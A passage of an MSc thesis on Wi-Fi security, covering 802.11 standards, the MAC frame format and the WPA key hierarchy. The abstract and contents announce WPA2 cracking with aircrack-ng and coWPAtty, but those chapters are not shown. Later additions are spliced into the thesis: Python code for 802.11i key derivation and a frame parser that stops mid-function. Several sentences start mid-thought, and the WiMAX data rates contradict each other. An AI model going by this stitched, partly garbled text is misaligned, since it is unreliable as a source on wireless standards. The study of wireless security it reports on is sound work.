LOUKAS TRIANTAFYLLOPOULOS
MA COMPUTER SCIENCE
2016
MARCONI UNIVERSITY
MARCH 2016
ACKNOWLEDGEMENTS
First and foremost, I wish to express my gratitude to my wife and two little sons for their continual
support, not only during the write-up of this dissertation, but also for the entire duration of my MSc
studies.
TABLE OF CONTENTS
ACKNOWLEDGEMENTS
LIST OF TABLES & GRAPHS
LIST OF IMAGES
LIST OF ABBREVIATIONS
ABSTRACT
INTRODUCTION - CHAPTER 1
LITERATURE REVIEW
CHAPTER 2 - WIRELESS NETWORKS
2.1. About Wi-Fi
2.2. About Wireless Networks
2.2.1. Advantages of wireless networks
2.2.2. Disadvantages of wireless networks
2.3. Who needs a wireless connection
2.4. Structural Elements
2.5. Wireless Networking Standards
2.6. The 802.11 standard
2.6.1. 802.11 versions
2.6.2. Architecture of IEEE 802.11
2.6.3. Services of IEEE 802.11
2.6.4. IEEE 802.11 Protocol Architecture
CHAPTER 3: SECURITY IN WIRELESS NETWORKS
3.1. What is encryption?
3.1.1. Symmetric key encryption
3.1.2. Public key encryption
3.2. Wireless network encryption protocols
3.2.1. WEP encryption
3.2.2. WPA encryption (Wi-Fi Protected Access)
3.2.3. WPA or WEP
3.2.4. WPA2 (Wi-Fi Protected Access Version 2)
3.3. Types of attacks on wireless networks
3.3.1. Passive attacks
3.3.2. Active attacks
EMPIRICAL PART 1
CHAPTER 4: LOCATION ANALYSIS IN TERMS OF WIRELESS NETWORKS SECURITY
4.1. About Wardriving
4.2. Wardriving Equipment
4.2.1. Why a smartphone
4.2.2. Wigle Wifi Wardriving Android Application
4.3. Wardriving analysis in and around the central town of Tinos, Greek island
4.3.1. Preparation process for analysis of data
4.4. Security analysis of wireless networks in and around the central town of Tinos, Greek island - Results
4.5. Channel analysis of wireless networks in and around the central town of Tinos, Greek island - Results
EMPIRICAL PART 2
CHAPTER 5: CRACKING SECURITY IN WIRELESS NETWORKS
5.1. About Linux, a good environment
5.2. About Kali Linux, the next generation of BackTrack
5.3. Equipment for Cracking Wireless Networks Security
5.4. Preparation of attack
5.4.1. Dictionary attack
5.4.2. Pre-computed hashes
5.5. The Aircrack-ng suite
5.5.1. About Airmon-ng
5.5.2. About Airodump-ng
5.6. Airolib-ng & Aircrack-ng
5.7. coWPAtty
5.8. genpmk & coWPAtty
5.9. Comparison of attacks
CONCLUSIONS
BIBLIOGRAPHY
LIST OF TABLES & GRAPHS
TABLE 1. Wireless networks in and around the central town of Tinos, Greek island – Security analysis of data
TABLE 2. Wireless networks in and around the central town of Tinos, Greek island – Channel analysis of data
TABLE 3. A comparative table of the results of the attacks used in the project
GRAPH 1. Wireless networks in and around the central town of Tinos, Greek island – Security analysis of data
GRAPH 2. Wireless networks in and around the central town of Tinos, Greek island – Channel analysis of data
GRAPH 3. Time taken to crack WPA/WPA2
GRAPH 4. Time taken to crack WPA/WPA2 via dictionary attack
GRAPH 5. Time to pre-calculate hashes (seconds)
GRAPH 6. Time taken to crack WPA/WPA2 via pre-calculated hashes
LIST OF IMAGES
Image 1 – Diagram of a Computer Network
Image 2 – Wi-Fi Alliance logo
Image 3 – Wi-Fi Certified logo
Image 4 – Representation of Ad-hoc mode
Image 5 – Representation of Infrastructure BSS mode
Image 6 – Infrastructure mode and an ESS
Image 7 – 802.11 and OSI Model
Image 8 – 802.11 MAC Frame Format
Image 9 – Frame Control Field
Image 10 – Sequence Control Field
Image 11 – A simple Encryption-Decryption system
Image 12 – Standard WEP Encryption Process using RC4 algorithm with XOR operation
Image 13 – WPA-PSK mode
Image 14 – WPA-Enterprise mode
Image 15 – WPA implementation (*)
Image 16 – WPA2 implementation
Image 17 – Vodafone Smart 4 Review
Image 18 – Wigle Wifi Wardriving Application at Google Play Store
Image 19 – Wigle Wifi Wardriving Android Application Framework
Image 20 – Data tab in Wigle Wardriving app
Image 21 – Wireless Networks in and around the central town of Tinos, Greek island – Google Earth view
Image 22 – Wardriving followed paths in and around the central town of Tinos, Greek island – Google Earth view
Image 23 – Step 1 preview
Image 24 – Step 2 preview
Image 25 – Uniformly classified data of CSV file
Image 26 – Table of data after the right modification
Image 27 – Tux the penguin, mascot of Linux
Image 28 – Kali Linux logo
Image 29 – Samsung R530 preview
Image 30 – HP Compaq 610 preview
Image 31 – Huawei Echolife HG520c preview
Image 32 – The wireless card in monitor mode
Image 33 – Collection of Initialization Vectors (IVs)
Image 34 – "Concept" of the handshake packet
Image 35 – "Concept" of the handshake packet
Image 36 – Aircrack-ng in process
Image 37 – Aircrack-ng in process
Image 38 – Attack using database
Image 39 – Attack using database
Image 40 – CoWPAtty in process
Image 41 – CoWPAtty in process
Image 42 – Preparation with genpmk
Image 43 – Preparation with genpmk
Image 44 – Attack using pre-computed hashes
Image 45 – Attack using pre-computed hashes
LIST OF ABBREVIATIONS
AP (Access Point): A router, switch or hub device that manages multiple wireless connections to a network.
Ad hoc: The mode in which computers connect to one another directly to form a network, without the interposition of an AP.
ARP (Address Resolution Protocol): A network layer protocol used to convert an IP address into a physical address (called a DLC address), such as an Ethernet address.
Authenticator: The device that initiates the connection of a station with another station or with a network (typically an AP).
Beacon: Small, often inexpensive device that enables more accurate location within a narrow range than GPS, cell tower triangulation and Wi-Fi proximity.
EAP (Extensible Authentication Protocol): A general authentication protocol that supports multiple authentication methods, such as token cards, Kerberos, one-time passwords, certificates, public key authentication and smart cards.
Fragmentation: The process in which an information packet is broken up into smaller packets when sent, which are reassembled at their destination.
Frame: For practical purposes a frame is the same thing as a packet. By convention, messages exchanged at layer 2 of the OSI model are called frames, and messages exchanged at layer 3 are called packets.
Handshake: A series of questions and answers carried out for the purpose of identifying the supplicant.
ICV (Integrity Check Value): A checksum capable of detecting modification of an information system (IS).
Infrastructure: The mode of operation in which a computer connects first to an AP and through it to the network.
IV (Initialization Vector): A non-secret binary vector used as the initializing input to an algorithm for encrypting a sequence of plaintext blocks; it increases security by introducing additional cryptographic variance and synchronizes cryptographic equipment.
KCK (Key Confirmation Key): Integrity control key that protects the handshake messages.
KEK (Key Encryption Key): Encryption key that protects the handshake messages.
MAC Address (Media Access Control Address): A 48-bit address that uniquely identifies each physical machine on an Ethernet local area network.
MIC (Message Integrity Code): Data field appended to the plaintext for checking its integrity (generated by the Michael algorithm).
MK (Master Key): Within a hierarchy of encrypting keys and transaction keys, the highest-level key-encrypting key.
Monitor Mode: The operational mode of a Wi-Fi device in which it receives the packets circulating on the Wi-Fi network. Also known as raw mode.
Packet: A sequence of binary digits, including data and control signals, that is transmitted and switched as a composite whole.
PMK (Pairwise Master Key): Master key in the pairwise key hierarchy.
PRGA (Pseudo Random Generation Algorithm): The process that produces the RC4 key stream.
PSK (Pre-Shared Key): Key generated from a password, which takes the place of the PMK in WPA-PSK mode.
Rainbow Tables: Precomputed hashes of candidate words, for use in brute-force or dictionary attacks.
TKIP (Temporal Key Integrity Protocol): Encryption protocol used in WPA, based on the RC4 algorithm (which is also used in WEP).
TMK (Temporary MIC Key): Key for data integrity of unicast traffic (TKIP).
WEP (Wired Equivalent Privacy): Default encryption protocol used on 802.11 networks.
Wi-Fi (Wireless Fidelity): The well-known wireless technology.
WPA, WPA1 (Wi-Fi Protected Access): The initial version of WPA, sometimes called WPA1, is essentially a brand name for TKIP. TKIP was chosen as an interim standard because it could be implemented on WEP hardware with just a firmware upgrade.
WPA2: The trade name for an implementation of the 802.11i standard, including AES and CCMP.
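The PSK, PMK, KCK, KEK and TMK entries above are successive levels of the WPA/WPA2-PSK key hierarchy. The following Python example is added here and is not from the thesis: it derives the PMK from a passphrase and SSID and expands it into the per-session keys, using the parameters of IEEE 802.11i (PBKDF2-HMAC-SHA1 with 4096 iterations and the SSID as salt; PRF-512 with the "Pairwise key expansion" label), which the glossary does not spell out. The MAC addresses and nonces in the demo are constructed sample values.

```python
import hashlib
import hmac
from typing import Dict

# Parameters of the WPA/WPA2-PSK key hierarchy as specified in IEEE 802.11i
# (Annex H.4 for the passphrase mapping, clause 8.5.1.2 for the PRF). These
# constants come from the standard, not from the thesis text.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32                      # 256-bit PMK
PTK_LABEL = b"Pairwise key expansion"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Map a passphrase to the 256-bit PMK used in WPA-PSK mode.

    The SSID is the PBKDF2 salt, so one passphrase gives a different PMK on
    every network name; a precomputed (rainbow) table is therefore only
    valid for the single SSID it was built for.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("802.11i passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def prf(key: bytes, label: bytes, data: bytes, nbits: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1 blocks with a one-byte counter."""
    out = b""
    counter = 0
    while len(out) < nbits // 8:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]),
                        hashlib.sha1).digest()
        counter += 1
    return out[: nbits // 8]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes,
               anonce: bytes, snonce: bytes) -> Dict[str, bytes]:
    """Expand the PMK into the per-session PTK during the 4-way handshake.

    aa/spa are the authenticator (AP) and supplicant MAC addresses, anonce/
    snonce the nonces exchanged in handshake messages 1 and 2. The inputs
    are ordered with min/max, so both sides compute the same PTK regardless
    of which address or nonce is "theirs". Returns the TKIP split into the
    keys the glossary lists: KCK, KEK, TK and the two TMKs.
    """
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, PTK_LABEL, data, 512)
    return {
        "KCK": ptk[0:16],    # Key Confirmation Key: MIC over handshake messages
        "KEK": ptk[16:32],   # Key Encryption Key: wraps the group key in message 3
        "TK": ptk[32:48],    # temporal key for unicast data encryption
        "TMK1": ptk[48:56],  # Temporary MIC Keys for TKIP's Michael MIC
        "TMK2": ptk[56:64],
    }


if __name__ == "__main__":
    # IEEE 802.11i Annex H.4 test case 1: passphrase "password", SSID "IEEE".
    pmk = derive_pmk("password", "IEEE")
    # Constructed sample values: these addresses and nonces are not real captures.
    ap_mac = bytes.fromhex("020000000001")
    sta_mac = bytes.fromhex("020000000002")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    keys = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)
    print("PMK  ", pmk.hex())
    for name, value in keys.items():
        print(f"{name:5s}", value.hex())
```

Because the SSID salts the PMK, a precomputed table of the kind the glossary calls rainbow tables is valid for one SSID only, and because the handshake's addresses and nonces travel in the clear, the passphrase is the only secret the PSK mode relies on.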
ABSTRACT
The purpose of this thesis is to describe the way wireless networks work, as well as their encryption protocols, and to address the threat of security violations. More precisely, all active wireless networks in and around the central town of the Greek island of Tinos will be searched for and registered using specific functions and the WiGLE Android application. Dictionary and precomputed-hash attacks will be prepared, and finally the security of a WPA/WPA2-encrypted wireless network will be violated.
More specifically, chapter two describes the human need for remote communication, the definition and architecture of wireless networks, the categories they are divided into, and the differences between wireless and wired networking.
Chapter two also describes the advantages and disadvantages of using wireless networks, analyzes the wireless devices in use and describes wireless networking standards. Moreover, it analyzes the publications and architecture of the 802.11 standard.
Chapter three refers to the types of encryption algorithms, describes and compares in detail the encryption protocols WEP and WPA/WPA2, and analyzes two types of attacks.
Chapter four is the first empirical part of this thesis, a location analysis in terms of wireless network security in and around the central town of the Greek island of Tinos. The analysis of the extracted CSV file presents statistical information about the cryptographic methods and channels in use.
Chapter five describes the violation of wireless security. It presents in detail the tools used for searching, registering and violating wireless networks. Based on the statistics from the first empirical part of this thesis, a wireless network SSID with the most common cryptographic method (WPA2) is analyzed using some powerful security attacks. The effects of the attacks will be compared and the results analyzed in detail.
INTRODUCTION - CHAPTER 1
From the beginning of time, the need for communication, in the sense of exchanging information, has been a vital asset for survival. However, the element of flexibility was achieved only in the 20th century with the advent of remote communication. The invention and use of telephones, televisions, radio signals and, more generally, computer networks are the elements that have contributed to the particularly rapid growth of remote communication.
A computer network is a data communication system that connects two or more computers to each other and to other remote devices. The term "connect" refers to the ability to exchange information.
A computer network consists of the following components:
Terminal Nodes: This component controls the network resources (hardware and software).
Sub-Networks: Physical media, communication protocols, topology, terminal nodes and resources that differ among different sub-networks.
Interface devices: These devices connect heterogeneous sub-networks in order to achieve successful communication between terminal nodes located in different sub-networks.
[Image 1 – Diagram of a Computer Network. Source: www.conceptdraw.com]
but electromagnetic waves, usually at frequencies of 2.4 GHz and 5 GHz. For normal communication between wired and wireless networks, it is important to use specific standards.
A switched network is a physical network in which an infrastructure device (called a switch) directs packets based on their destination. This improves network performance by ensuring that only the hosts that need to receive a given packet actually see it. A shared network, on the other hand, is a network in which every packet is received by every device on the network.
Wireless communication is, undoubtedly, the fastest growing segment of the communications industry. Mobile telephones and satellite communications are characteristic examples of wireless services with the most rapid expansion worldwide, and are important tools for the development of countries.
LITERATURE REVIEW
[Image 2 – Wi-Fi Alliance logo. Source: commons.wikimedia.org]
The Wi-Fi Alliance organization has established a test suite that defines how member products will be
tested by an independent test lab. Products that pass these tests are entitled to display the Wi-Fi
trademark, which is a seal of interoperability. These Wi-Fi interoperability tests are designed to ensure
that hardware from different vendors can successfully establish a communication session with an
acceptable level of functionality.
[Image 3 – Wi-Fi Certified logo. Source: www.wi-fi.org]
This trademark serves as a certification for any prospective buyer of a device and as a guarantee of its usability. A consumer buying a device with this logo has the assurance that it will work with every other device bearing the same trademark.
i) Health and safety
Because there are no wires involved in a wireless connection, the risk of tripping over the trailing cables that wired connectivity requires is avoided altogether.
a) Security
To address this concern, wireless networks may use one of the various encryption technologies available. Some of the more commonly used encryption methods, however, are known to have weaknesses that a dedicated adversary can exploit.
b) Range
The typical range of a common 802.11g network with standard equipment is on the order of tens of meters. While sufficient for a typical home, it will be insufficient in a larger structure. To obtain additional range, repeaters or additional access points have to be purchased, and the cost of these items can add up quickly.
c) Reliability
Like any radio frequency transmission, wireless networking signals are subject to a wide variety of interference, as well as to complex propagation effects that are beyond the control of the network administrator.
d) Speed
The speed of most wireless networks (typically 1-54 Mbps) is far slower than that of even the slowest common wired networks (100 Mbps up to several Gbps). In specialized environments, therefore, the throughput of a wired network might be necessary.
e) Electricity consumption
Wi-Fi routers consume more electricity than wired broadband connections, because power is needed to spread the Wi-Fi signal over an area of about 40 meters.
Wireless networks have many uses. During the last decades they have been deployed in various categories of application, such as educational, professional and household applications.
Some important features of wireless networks are:
1. With a wireless network it is very easy to share an Internet connection among all Wi-Fi devices.
2. If a company occupies more than one building, there is a legitimate need for communication between their networks. The use of wireless switching is the simplest and most economical solution, with the only disadvantage being a possible security breach.
3. In conference rooms (meeting rooms) it is possible to access information from the corporate network.
4. Hot spots: Apart from the internal network, a company can expand its customer base, and thus its profits, by offering various services at selected locations on its premises. Such places can be found in restaurants, cafés, hotels, airports, hospitals, railway stations, etc.
5. Doctors and nurses use wireless handheld devices to have direct access to patients' personal files and to medical libraries.
6. Deployment of networks is possible in old buildings where cabling is unprofitable or restricted.
7. Deployment of wireless networks as a backup to wired installations.
v) Antennas
An antenna is a device that allows the effective transmission and reception of radio waves, based on the phenomenon of electromagnetic induction. When an antenna operates as a receiver, it picks up radio waves and converts them into alternating current; when it operates as a transmitter, it takes alternating current and converts it into radio waves.
Antennas can be broadly classified as omnidirectional and directional, depending on their directionality.
Omnidirectional antennas are most commonly used to create hot spots, transmitting a signal over a large area in all directions or receiving signals from all directions when the transmitting location is unknown or close by. Omnidirectional Wi-Fi antennas do not need to be pointed in a particular direction, since their radiation pattern covers all 360 degrees.
Directional antennas, as the name implies, provide signal coverage in a specified direction. Unlike omnidirectional antennas, they must be aimed at the signal transmitter or receiver, which can be, for example, a router or Wi-Fi hotspot. When aiming the antenna, the user must be right on the signal to obtain the best strength and quality.
In 2003 the IEEE adopted the standard known as 802.16 WiMAX to satisfy the requirements for stable wireless broadband access at high speed over long distances. As with the 802 series standards for wireless LANs, 802.16 defines a family of standards with options for specific settings. Unlike other wireless networks that allow transmission in only one frequency range, WiMAX allows data transfer using multiple frequencies. It operates in the frequency range of 10-66 GHz and has a data transfer rate of 120 Mbps.
1. For more information: en.wikipedia.org/wiki/IEEE_802.11
2. For more information: en.wikipedia.org/wiki/IEEE_802.11
3. For more information: en.wikipedia.org/wiki/HiperLAN
4. For more information: www.labs.hpe.com/personal/Jean_Tourrilhes/Linux/Linux.Wireless.std.html
5. For more information: en.wikipedia.org/wiki/HomeRF
6. For more information: en.wikipedia.org/wiki/Bluetooth
A significant difference between IEEE 802.16 and IEEE 802.11 is that the former can be used with much lower data rates of 50 Mbps.
B) OpenAir standard
OpenAir was an early wireless standard promoted by the Wireless LAN Interoperability Forum and implemented predominantly by Proxim Wireless devices. It operated in the 2.4 GHz ISM band and used frequency hopping with 0.8 and 1.6 Mbit/s bit rates via 2- or 4-bits-per-symbol modulation. The protocol used is CSMA/CA, based on the exchange of RTS/CTS packets.
C) HiperLAN standard
HiperLAN is a standard for wireless networking in the 5.1-5.3 GHz frequency band, developed in 1996 by ETSI (European Telecommunications Standards Institute).
There are the following four versions:
1. HiperLAN/1
2. HiperLAN/2
3. HiperAccess
4. HiperLink
Due to competition from IEEE 802.11, which was simpler to implement and as a result reached the market faster, HiperLAN never received much commercial implementation. Much of the work on HiperLAN/2 has survived in the PHY specification for IEEE 802.11a, which is nearly identical to the PHY of HiperLAN/2. HiperAccess was intended as a last-mile technology. HiperLink was intended as a short-range point-to-point technology at 155 Mbit/s.
D) HomeRF SWAP standard
HomeRF was a wireless networking specification for home devices. It was developed in 1998 by the Home Radio Frequency Working Group, a consortium of mobile wireless companies that included Proxim Wireless, Intel, Siemens AG, Motorola, Philips and more than 100 other companies. The SWAP model operates at 2.4 GHz and uses FHSS, with transmission rates of 1 and 2 Mbps.
E) Bluetooth standard
Bluetooth is a wireless technology standard for exchanging data over short distances between fixed and mobile devices; it also builds personal area networks (PANs). Invented by telecom vendor Ericsson in 1994, it was originally conceived as a wireless alternative to RS-232 data cables. It can connect several devices, overcoming problems of synchronization. It uses FHSS at an operating frequency of 2.4 GHz, with a range of up to 200 m and a data rate that reaches 3 Mbps.
2.6.1.802.11 versions
Since the original version, the standard has been implemented in various publications, defined by
letters.
802.11a and 802.11h: The 802.11a extension to 802.11 was developed to make use of the lower
part of the 5 GHz band. The standard has a maximum bit rate of 54 Mbit/s using OFDM. The
allocation in the 5 GHz band for RLAN was later extended. The 5 GHz band ranging from 5150-
5350 and from 5470 - 5725 MHz can be used nowadays in most parts of the world. However,
equipment has to detect and avoid radar systems that use the band and need to have transmit
power control. The 802.11h standard was developed to cater for these provisions.
802.11b: The IEEE 802.11 standard became popular after the publication of the 802.11b
extension in 1999. This extension to the original standard provides a maximum bit rate of 11
Mbit/s. The bit rate will be decreased to 5.5, 2 or 1 Mbit/s if the link quality decreases. The
802.11b standard uses direct sequence spread spectrum coding.
802.11e: The IEEE 802.11e standard provides a set of Quality of Service features including
priority of data streams. This standard is mainly of relevance for time critical applications, such as
voice and streaming multimedia.
802.11f (withdrawn): IEEE 802.11f was a recommended practice to ease handovers between access
points of different vendors. The recommendation has been withdrawn.
802.11g : The 802.11g standard was a further development of the standard to improve the bit rate
if the link quality allows. The maximum bit rate is 54 Mbit/s. This bit rate can only be achieved if
the user is in the vicinity of the access point.
802.11i: IEEE 802.11i enhances authentication and encryption. The original standard included
WEP (Wired Equivalent Privacy), which proved to be vulnerable. The full 802.11i design is commonly
known as WPA2 and uses the AES-based CCMP. An intermediate version called WPA (Wi-Fi Protected
Access) was introduced after the security problems of WEP were shown; WPA implements a subset of
IEEE 802.11i (TKIP) that could still run on existing WEP hardware.
802.11j: IEEE 802.11j is an amendment to the IEEE 802.11 standard for the Japanese market. It
allows Wireless LAN operation in the 4.9 to 5 GHz band.
802.11k: IEEE 802.11k is an amendment to the standard for radio resource management. It allows
the exchange of radio and network information, which a client can use to switch to the best
available access point.
802.11n: IEEE 802.11n is a standard that further improves the data throughput. The throughput is
increased to a maximum net bit rate of 600 Mbit/s. This throughput is achieved by bonding two 20 MHz
channels (channel bonding) and by sending several spatial streams over multiple antennas (MIMO).
802.11r: IEEE 802.11r adds support for roaming to the standard. This makes seamless
handovers possible in larger areas with WiFi coverage.
802.11s: IEEE 802.11s defines how traffic can be delivered over self-configuring multi-hop
topologies to create a WLAN mesh network.
802.11z: IEEE 802.11z is a mechanism to directly transfer data between two Wi-Fi clients that are
part of the same Wi-Fi network.
802.11ac: IEEE 802.11ac Gigabit Wi-Fi is specifically designed to increase the bit rate in the 5
GHz band. This band offers more channels with a better separation than the 2.4 GHz band. IEEE
802.11ac makes channel bonding possible up to a channel width of 80 MHz, and even 160 MHz
under certain conditions. IEEE 802.11ac further uses MIMO and more efficient data encoding
mechanisms to increase the maximum bit rate up to 6.93 Gbit/s under certain specialized
conditions.
802.11ad: IEEE 802.11ad is specifically designed for use in the unlicensed 60 GHz band, where far
more overall bandwidth is available than in the 2.4 and 5 GHz bands. The development of the
standard started in the Wireless Gigabit Alliance (WiGig), and their work has since moved into
the IEEE 802.11ad specification.
802.11af: IEEE 802.11af is an amendment that uses white spaces in the TV bands. It is also
known as White-Fi.
Source: www.techtolink.com.hk
Infrastructure BSS
Infrastructure wireless networks differ from ad-hoc networks in their use of access points. In
infrastructure mode a base station acts as the wireless access point (the hub), and all stations communicate
through it. The access point usually, but not always, has a wired or fibre uplink, and it may also hold
permanent wireless links to other nodes.
Source: ardidudidam.blogspot.com
The use of an access point provides two significant advantages:
The radius of the BSS service area is determined by the distance from the access point, so a
station only needs to be within range of the access point, not of every other station.
The structure of the infrastructure BSS allows the network to be managed from a central node and
gives great flexibility in applying security policy: every wireless station has to pass through the
access point to communicate with the rest of the network, so access control and encryption can be
enforced there.
Source: technet.microsoft.com
The Distribution System (DS) is the component of the architecture that interconnects BSSs. The
connection is achieved by linking the access points of the BSSs together via a network trunk. This
enables communication between wireless stations located in different BSSs, as well as migration
from one BSS to another without interrupting communication. Of course, this only works
provided that there are no gaps in coverage between the BSSs.
Distribution: A station uses the distribution service every time it sends MAC frames across a distribution
system. The 802.11 standard does not specify how the distribution system delivers the data; the
distribution service only provides the distribution system with enough information to determine the
proper destination BSS.
Integration: Because the characteristics of the distribution system are unspecified by the IEEE 802.11
standard, integration is needed. The integration service enables the delivery of MAC frames through a
portal between a distribution system and a non-802.11 LAN. The integration function performs all
required media or address space translations. The details of an integration function depend on the
distribution system implementation and are beyond the scope of the 802.11 standard.
Delivery of MSDUs: The delivery of MAC Service Data Units to their final destination.
Association: Each station must initially invoke the association service with an access point before it can
send information through a distribution system. The association maps a station to the distribution system
via an access point. Each station can associate with only a single access point, but each access point can
associate with multiple stations. Association is also the first step to providing the capability for a station to
be mobile between BSSs.
Reassociation: Enables an established association to be transferred from one access point to
another, allowing a mobile station to move from one BSS to another while retaining its connection to
the network.
Disassociation: A station or access point may invoke the disassociation service to terminate an existing
association. This service is a notification; therefore, neither party can refuse termination. Stations should
disassociate when leaving the network. An access point, for example, may disassociate all its stations if
it is being removed for maintenance. Note that in the original standard disassociation and deauthentication
frames carry no cryptographic protection, so any party within radio range can forge them and force a
station off the network; only the later 802.11w amendment (protected management frames) closes this gap.
Authentication: Used to verify the identity of stations to each other. In a wired network it is
generally assumed that physical access to a connection confers the right to use the network. In
wireless networks the physical connection is achieved simply by having a suitably tuned antenna,
so stations use the authentication service to verify each other's identity instead.
Deauthentication: This service is invoked to terminate an existing authentication.
Privacy: Used to prevent the contents of messages from being read by stations other than the
intended recipient. The standard allows the optional use of encryption to provide this protection.
Source: technet.microsoft.com
The physical layer defines how signals are transmitted and received. The data link layer of the OSI
model is subdivided into two sublayers, Medium Access Control (MAC) and Logical Link
Control (LLC). The MAC sublayer defines how the transmission medium is accessed and how reliable
data transmission is achieved. The LLC sublayer is a common interface that is shared by all IEEE LAN
standards.
The MAC sublayer is responsible for controlling the following functions:
Controlling the access of stations to the transmission medium
Fragmentation and reassembly of frames
Retransmission of packets
Positive acknowledgement of received frames
The MAC sublayer architecture specifies two access methods:
Distributed Coordination Function (DCF)
Point Coordination Function (PCF)
DCF is the basic method; PCF is built on top of it and implements a polling algorithm that tries to
provide better QoS.
The Distributed Coordination Function (DCF) is the fundamental MAC technique of IEEE
802.11 based WLANs. It is the basic method used to support asynchronous data transfer, and, as
defined in the standard, all stations must support it. Its operation is based on Carrier Sense Multiple
Access with Collision Avoidance (CSMA/CA). DCF has no collision detection mechanism such as
the CSMA/CD of Ethernet, because detecting collisions is not practical in a wireless network: a
transmitting radio cannot listen at the same time. Before transmitting, a station must monitor the
physical medium to ascertain whether another station is already transmitting. In wired networks this
is easy, because all nodes are connected to a common cable and can hear each other. In wireless
networks each station's transceiver has a limited range and can hear only its neighbours, so two
stations that are both in range of the access point may be out of range of each other (the hidden
node problem). To coordinate use of the channel, sender and receiver can exchange short
Request to Send (RTS) and Clear to Send (CTS) control frames before the data frame: every station that
hears either frame defers for the duration announced in it. This exchange takes place after the medium has
been found idle and just before the data is sent, and it reduces the probability of packet collisions. It
improves reliability in networks with many stations, where the probability of collisions is increased.
The Point Coordination Function (PCF) is an optional MAC technique used in IEEE 802.11
based WLANs. It operates on top of DCF: the two methods alternate in time, with a contention-free
period under PCF followed by a contention period under DCF. It requires a central station (the
Point Coordinator, normally the access point) which takes over centralized scheduling of the
transmissions of the other stations. The Point Coordinator polls all stations cyclically, asking whether
they have data to send, and a station may transmit only when it is polled.
The devices used in wireless networks communicate by exchanging frames at the MAC sublayer. The
802.11 frame format is shown below.
Source: technet.microsoft.com
The MAC frame consists of a header of up to 30 bytes, a frame body of variable length and a 4-byte
Frame Check Sequence (FCS).
Frame Control Field
This field is important because it states the type of frame and provides control information.
Source: technet.microsoft.com
It consists of 11 subfields, several of which matter for the security mechanisms of 802.11. They are:
Protocol version: Indicates the version of the 802.11 MAC carried in the frame (currently always 0).
Type: Distinguishes the three frame types: control frames, data frames and management frames.
Subtype: Subdivides each of the basic types into subtypes (for example beacon, authentication and
deauthentication are management subtypes; RTS, CTS and ACK are control subtypes).
To DS: Set to 1 when a data frame is destined for the distribution system.
From DS: Set to 1 when a data frame leaves the distribution system.
More fragments: Set to 1 when further fragments of the same frame follow this one.
Retry: Set to 1 when the frame is a retransmission.
Power Management: Indicates the power management state of the transmitting station. A value of 1
means the station will be in sleep mode after this exchange.
More Data: Indicates that the access point has more buffered data for a station in power-save mode.
Each block of data may be transmitted as one frame or as several fragments in multiple frames.
Protected frame (formerly WEP): In the original 802.11 standard this bit was called WEP. With
802.11i it was renamed Protected Frame; a value of 1 declares that the frame body is encrypted with a
security protocol (WEP, TKIP or CCMP).
Order: A value of 1 indicates that the strictly ordered service class is used.
Duration/ID Field
This field is used for all control type frames, except with the subtype of Power Save (PS) Poll, to indicate
the remaining duration needed to receive the next frame transmission. When the sub-type is PS Poll, the
field contains the association identity (AID) of the transmitting STA.
Address Fields
Depending upon the frame type, the four address fields will contain a combination of the following
address types:
BSS Identifier (BSSID). BSSID uniquely identifies each BSS. When the frame is from an STA
in an infrastructure BSS, the BSSID is the MAC address of the AP. When the frame is from a
STA in an IBSS, the BSSID is the randomly generated, locally administered MAC address of the
STA that initiated the IBSS.
Destination Address (DA). DA indicates the MAC address of the final destination to receive the
frame.
Source Address (SA). SA indicates the MAC address of the original source that initially created
and transmitted the frame.
Receiver Address (RA). RA indicates the MAC address of the next immediate STA on the
wireless medium to receive the frame.
Transmitter Address (TA). TA indicates the MAC address of the STA that transmitted the
frame onto the wireless medium.
Sequence Control
This field contains two subfields, the Fragment Number field and the Sequence Number field.
Source: technet.microsoft.com
Sequence Number indicates the sequence number of each frame. The sequence number is the same for
each frame sent for a fragmented frame; otherwise, the number is incremented by one until reaching
4095, when it then begins at zero again.
Fragment Number indicates the number of each frame sent of a fragmented frame. The initial value is
set to 0 and then incremented by one for each subsequent frame sent of the fragmented frame.
Frame Check Sequence
The transmitting STA computes a cyclic redundancy check (CRC-32) over all the fields of the MAC header
and the frame body to generate the Frame Check Sequence value. The receiving STA performs the same
CRC calculation and compares the result with the received Frame Check Sequence field to verify whether
any errors occurred during transmission. Because the FCS is a plain CRC and not a keyed value, it detects
transmission errors only; it gives no protection against deliberate modification of a frame.
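The frame format described above can be checked against real bytes with a small parser. The following Python script is an added example and is not part of the thesis: it assembles two constructed frames (a deauthentication management frame and a protected data frame, with invented locally administered MAC addresses), decodes the Frame Control subfields, assigns the address roles from the To DS/From DS bits, and verifies the FCS, which is CRC-32 over header and body sent least significant byte first.

```python
import struct
import zlib

# Frame type / subtype names used when describing a parsed header.
TYPE_NAMES = {0: "management", 1: "control", 2: "data"}
MGMT_SUBTYPES = {0: "association request", 1: "association response",
                 2: "reassociation request", 4: "probe request", 5: "probe response",
                 8: "beacon", 10: "disassociation", 11: "authentication",
                 12: "deauthentication"}
CTRL_SUBTYPES = {10: "PS-Poll", 11: "RTS", 12: "CTS", 13: "ACK"}


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_frame_control(fc):
    """Split the 16-bit Frame Control value (little-endian on the air) into its subfields."""
    return {
        "protocol_version": fc & 0x3,
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "to_ds": bool(fc & 0x0100),
        "from_ds": bool(fc & 0x0200),
        "more_fragments": bool(fc & 0x0400),
        "retry": bool(fc & 0x0800),
        "power_mgmt": bool(fc & 0x1000),
        "more_data": bool(fc & 0x2000),
        "protected": bool(fc & 0x4000),
        "order": bool(fc & 0x8000),
    }


def address_roles(info):
    """Map Address 1..4 to DA/SA/BSSID/RA/TA from the To DS / From DS bits (data frames).
    Management frames always carry RA, TA, BSSID."""
    if info["type"] == 0:
        return {"RA": info["addr1"], "TA": info["addr2"], "BSSID": info["addr3"]}
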